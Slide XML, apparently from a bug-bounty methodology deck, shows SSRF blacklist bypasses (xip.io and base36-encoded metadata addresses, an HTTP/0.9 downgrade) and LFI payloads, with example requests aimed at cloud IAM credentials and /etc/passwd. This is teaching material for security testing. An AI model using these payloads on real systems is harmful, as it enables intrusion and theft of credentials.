            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>169.254.169.254.xip.io</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>169.254.169.254 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254.xip.io/latest/user-data</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Google Shape;455;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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56" name="Google Shape;456;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="458" name="Google Shape;458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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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Google Shape;459;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Google Shape;460;p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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100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p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="462" name="Google Shape;462;p5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22925" y="3110050"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solid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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../../../../etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%252fetc%252fpasswd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is LFI </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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14" name="Google Shape;214;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="216" name="Google Shape;216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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="Google Shape;218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4025" y="2675525"/>
            <a:ext cx="421000" cy="36510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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="220" name="Google Shape;220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4025" y="3067788"/>
            <a:ext cx="421000" cy="36510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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Blog</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Google Shape;222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4025" y="3525200"/>
            <a:ext cx="421000" cy="36510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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Google Shape;224;p4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22925" y="3939538"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base36(int('254.169.254.169')) e.g. http://1ynrnhl.xip.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>169.254.169.254 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://1ynrnhl.xip.io/latest/user-data</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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70" name="Google Shape;470;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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" name="Google Shape;471;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="472" name="Google Shape;472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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Google Shape;473;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="474" name="Google Shape;474;p5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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com.1ynrnhl.xip.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>169.254.169.254 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com1ynrnhl.xip.io/latest/user-data</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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82" name="Google Shape;482;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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3" name="Google Shape;483;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="484" name="Google Shape;484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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500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Google Shape;485;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="486" name="Google Shape;486;p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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change The HTTP Version From 1.1 To HTTP/0.9 And Remove The Host Header</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/0.9</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/latest/meta-data/iam/security-credentials/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
